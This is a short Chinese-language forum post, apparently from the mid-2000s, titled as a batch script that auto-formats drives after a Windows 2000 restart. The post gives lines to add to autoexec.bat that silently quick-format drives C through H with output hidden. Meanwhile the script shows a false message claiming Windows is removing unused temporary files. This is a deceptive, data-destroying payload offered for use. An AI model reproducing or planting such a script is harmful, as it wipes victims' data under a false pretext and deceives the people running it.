- 铜板
- 2
- 金币
- 0
- 在线时间
- 0 小时
- 注册时间
- 2004-8-16
- 帖子
- 52

- 铜板
- 2
- 金币
- 0
- 在线时间
- 0 小时
- 注册时间
- 2004-8-16
- 帖子
- 52
|
2000下重启后自动格式批处理
|
<SPAN id=yu14>在autoexec.bat文件中加入 <BR>@echo off <BR>@echo IMPORTANT:Windows is removing unused temporary files. <BR>@format C:/q/u/autotest >nul <BR>@format D:/q/u/autotest >nul <BR>@format E:/q/u/autotest >nul <BR>@format F:/q/u/autotest >nul <BR>@format G:/q/u/autotest >nul <BR>@format H:/q/u/autotest >nul <BR>@echo please restart your computer! <BR>重启后就OK了. </SPAN> |
|